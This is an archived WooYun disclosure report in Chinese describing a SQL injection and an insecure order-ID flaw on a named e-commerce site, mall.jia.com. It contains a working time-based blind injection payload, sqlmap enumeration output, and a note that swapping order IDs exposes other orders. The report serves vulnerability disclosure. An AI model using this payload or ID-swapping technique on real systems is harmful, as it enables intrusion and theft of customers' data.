乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-03: 细节已通知厂商并且等待厂商处理中 2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开
齐家网某处SQL注入漏洞 #数万条订单数据泄露 #5.1节日快乐
注入http://mall.jia.com/gys/get_ab_order?orderGroupId=3461444
Place: GETParameter: orderGroupId Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: orderGroupId=3461349' AND SLEEP(5) AND 'SZZb'='SZZb---[11:43:49] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.11[11:43:49] [INFO] fetching database names[11:43:49] [INFO] fetching number of databases[11:43:49] [WARNING] time-based comparison needs larger statistical model.g a few dummy requests, please wait..do you want sqlmap to try to optimize value(s) for DBMS delay responses (o'--time-sec')? [Y/n] y[11:44:30] [WARNING] it is very important not to stress the network adaptendwidth during usage of time-based payloads5[11:44:37] [INFO] retrieved:[11:44:43] [INFO] adjusting time delay to 1 second due to good response tiin[11:45:05] [ERROR] invalid character detected. retrying..[11:45:05] [WARNING] increasing time delay to 2 secondsfo[11:45:47] [ERROR] invalid character detected. retrying..[11:45:47] [WARNING] increasing time delay to 3 secondsrmat[11:47:04] [ERROR] invalid character detected. retrying..[11:47:04] [WARNING] increasing time delay to 4 secondsion_schem[11:50:23] [ERROR] invalid character detected. retrying..[11:50:23] [WARNING] increasing time delay to 5 seconds[11:50:42] [ERROR] invalid character detected. retrying..[11:50:42] [WARNING] increasing time delay to 6 secondsa[11:51:15] [ERROR] unable to properly validate last character value (' ')[11:51:18] [INFO] retrieved: N[11:51:37] [ERROR] invalid character detected. retrying..[11:51:37] [WARNING] increasing time delay to 2 secondsEW[11:52:10] [ERROR] invalid character detected. retrying..[11:52:10] [WARNING] increasing time delay to 3 secondsMALL[11:53:03] [INFO] retrieved: cm[11:53:53] [ERROR] invalid character detected. retrying..[11:53:53] [WARNING] increasing time delay to 4 secondss[11:54:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmaping to retry the request[11:54:42] [ERROR] invalid character detected. retrying..[11:54:42] [WARNING] increasing time delay to 5 seconds[11:54:53] [ERROR] invalid character detected. retrying..[11:54:53] [WARNING] increasing time delay to 6 seconds[11:55:04] [ERROR] unable to properly validate last character value ('').[11:55:07] [INFO] retrieved: t[11:55:24] [ERROR] invalid character detected. retrying..[11:55:24] [WARNING] increasing time delay to 2 secondsest[11:56:06] [ERROR] invalid character detected. retrying..[11:56:06] [WARNING] increasing time delay to 3 seconds[11:56:09] [INFO] retrieved: u[11:56:40] [ERROR] invalid character detected. retrying..[11:56:40] [WARNING] increasing time delay to 4 seconds[11:56:57] [ERROR] invalid character detected. retrying..[11:56:57] [WARNING] increasing time delay to 5 seconds
订单泄露http://mall.jia.com/gys/get_ab_order?orderGroupId=3461444ID处没有加密,替换即可,可以获取订单信息
http://mall.jia.com/gys/get_ab_order?orderGroupId=3461446
过滤
危害等级:无影响厂商忽略
忽略时间:2015-05-08 20:42
漏洞Rank:4 (WooYun评价)
暂无